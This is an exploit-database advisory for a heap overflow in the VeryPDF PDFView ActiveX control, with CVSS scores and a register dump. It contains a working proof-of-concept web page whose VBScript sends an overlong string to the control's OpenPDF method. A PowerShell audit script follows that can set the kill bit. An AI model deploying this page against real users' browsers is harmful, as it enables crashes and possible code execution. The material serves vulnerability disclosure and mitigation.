VeryPDF PDFView OCX ActiveX OpenPDF Heap Overflow PoC

2008.12.13
Credit: r0ut3r
Risk: High
Local: Yes
Remote: No
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

<!--
VeryPDF PDFView OCX ActiveX OpenPDF Heap Overflow
Discovered & Written By: r0ut3r (writ3r [at] gmail.com / www.bmgsec.com.au)
Advisory: http://www.bmgsec.com.au/advisory/39/
---------------------------------------------------
Tested on: WinXP Pro SP2
Version: 2.0.0.1
GUID: {433268D7-2CD4-43E6-AA24-2188672E7252}
RegKey Safe for Script: True
RegKey Safe for Init: True

EAX 0003C910 ASCII "AAAAAAAAA""
ECX 000301D0
EDX 00000040
EBX 41414141
ESP 0013B8D8
EBP 0013BAF4
ESI 0003C908 ASCII "AAAAAAAAAAAAAAAAA""
EDI 41414141
EIP 7C91B3FB ntdll.7C91B3FB
-->

<object classid='clsid:433268D7-2CD4-43E6-AA24-2188672E7252' id='target'></object>

<script language='vbscript'>
Sub Boom
    buff = String(1006, "A")
    target.OpenPDF buff, 1, 1
End Sub
</script>

<input type=button onclick=Boom() value='Boom?'>
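The control is marked safe for scripting and initialization in the registry, so Internet Explorer will instantiate it from a web page unless its kill bit is set. The PowerShell script below is an added example, not part of the advisory: it audits the CLSID listed above and, with the hypothetical `-Apply` switch, sets the kill bit. It assumes the standard Windows registry locations and an elevated shell when writing.

```powershell
# Added example (not from the advisory). CLSID comes from the advisory;
# the -Apply switch name is this example's own choice.
param([switch]$Apply)   # -Apply writes the kill bit (needs an elevated shell)

$clsid   = '{433268D7-2CD4-43E6-AA24-2188672E7252}'
$killBit = 0x400        # "Compatibility Flags" bit that stops IE loading the control
$safeCat = @{
    '{7DD95801-9882-11CF-9FA9-00AA006C4EBD}' = 'safe for scripting'
    '{7DD95802-9882-11CF-9FA9-00AA006C4EBD}' = 'safe for initialization'
}
# Check both the native and the 32-bit (WOW64) registry views.
$views = 'HKLM:\SOFTWARE', 'HKLM:\SOFTWARE\WOW6432Node'

foreach ($root in $views) {
    $classKey  = "$root\Classes\CLSID\$clsid"
    $compatKey = "$root\Microsoft\Internet Explorer\ActiveX Compatibility\$clsid"
    if (-not (Test-Path $classKey)) { "$root : control not registered"; continue }

    $server = (Get-ItemProperty "$classKey\InprocServer32" -ErrorAction SilentlyContinue).'(default)'
    "$root : registered, server = $server"
    foreach ($cat in $safeCat.Keys) {
        if (Test-Path "$classKey\Implemented Categories\$cat") { "  marked $($safeCat[$cat])" }
    }

    # Read the current flags, if the compatibility key already exists.
    $flags = 0
    if (Test-Path $compatKey) {
        $prop = Get-ItemProperty $compatKey -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
        if ($prop) { $flags = [int]$prop.'Compatibility Flags' }
    }
    if ($flags -band $killBit) { "  kill bit already set"; continue }

    if ($Apply) {
        # Create the key only when missing so existing values are preserved.
        if (-not (Test-Path $compatKey)) { New-Item $compatKey -Force | Out-Null }
        Set-ItemProperty $compatKey -Name 'Compatibility Flags' -Value ($flags -bor $killBit) -Type DWord
        "  kill bit set"
    } else {
        "  kill bit NOT set (re-run with -Apply to set it)"
    }
}
```

The kill bit only stops Internet Explorer from instantiating the control; other hosts that load the OCX directly are not affected by it.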

References:

http://www.bmgsec.com.au/advisories/openpdf.txt


Copyright 2019, cxsecurity.com

 
